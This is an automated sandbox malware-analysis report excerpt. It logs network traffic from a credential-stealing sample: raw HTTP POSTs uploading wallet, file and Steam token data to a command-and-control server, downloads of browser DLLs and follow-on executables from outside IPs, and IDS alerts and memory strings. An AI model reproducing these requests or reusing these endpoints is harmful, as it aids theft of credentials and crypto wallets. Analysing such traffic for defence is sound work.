Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJJJDHDGDAAKECAKJDAHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4a 4a 44 48 44 47 44 41 41 4b 45 43 41 4b 4a 44 41 2d 2d 0d 0a Data Ascii: ------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BKJJJDHDGDAAKECAKJDAContent-Disposition: form-data; name="file"------BKJJJDHDGDAAKECAKJDA--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAAEHDHIIJKECBKEBAHost: 185.215.113.206Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 2d 2d 0d 0a Data Ascii: ------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="message"wallets------BKKKEGIDBGHIDGDHDBFH--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKEBFBAKKFCBGDHDGHDHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 45 42 46 42 41 4b 4b 46 43 42 47 44 48 44 47 48 44 2d 2d 0d 0a Data Ascii: ------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------BAKEBFBAKKFCBGDHDGHDContent-Disposition: form-data; name="message"files------BAKEBFBAKKFCBGDHDGHD--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECFIECBGDGCAAAEHIEHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 45 2d 2d 0d 0a Data Ascii: ------JJECFIECBGDGCAAAEHIEContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------JJECFIECBGDGCAAAEHIEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------JJECFIECBGDGCAAAEHIEContent-Disposition: form-data; name="file"------JJECFIECBGDGCAAAEHIE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFBHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="message"ybncbhylepme------GDBFBFCBFBKECAAKJKFB--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDAHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 32 31 31 66 39 32 31 39 66 37 35 31 36 65 62 31 30 37 63 61 61 39 36 30 66 39 62 38 63 33 32 39 33 33 35 63 66 66 30 37 65 61 34 63 36 30 61 62 35 39 34 37 37 36 63 38 33 65 61 61 39 62 64 30 36 65 63 63 37 66 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 45 43 47 49 45 42 4b 4a 4b 45 42 47 44 48 44 41 2d 2d 0d 0a Data Ascii: ------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="token"e211f9219f7516eb107caa960f9b8c329335cff07ea4c60ab594776c83eaa9bd06ecc7f8------DHCAECGIEBKJKEBGDHDAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------DHCAECGIEBKJKEBGDHDA--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 37 32 37 37 37 42 30 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB72777B05E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49738 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49706 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49740 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49746 -> 185.215.113.16:80

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49734 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB4CC60 PR_Recv,

0_2_6CB4CC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Lp2cm84rNS8nVma&MD=ernD8ueh HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Lp2cm84rNS8nVma&MD=ernD8ueh HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ogs.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com

Source: unknown

Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: skotes.exe, 00000014.00000002.2647162838.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/fac00b58987e8e7e7b9ca30804042ba5ce90ui
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe))
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe2962001
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe450
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe61395d
Source: skotes.exe, 00000014.00000002.2647162838.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe9oX
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exehp
Source: skotes.exe, 00000014.00000002.2647162838.00000000009DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exerlencodedU)
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.1978262092.0000000000694000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1978262092.0000000000777000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743257678.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll-u
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dllOt
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dllwo
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllCu
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllct
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll)o
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll:oH
Source: file.exe, 00000000.00000002.1979370069.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743257678.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.1979370069.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: file.exe, 00000000.00000002.1979370069.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllX
Source: file.exe, 00000000.00000003.1743257678.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1979370069.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743257678.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.1999524290.00000000233AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php.L
Source: file.exe, 00000000.00000003.1743257678.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
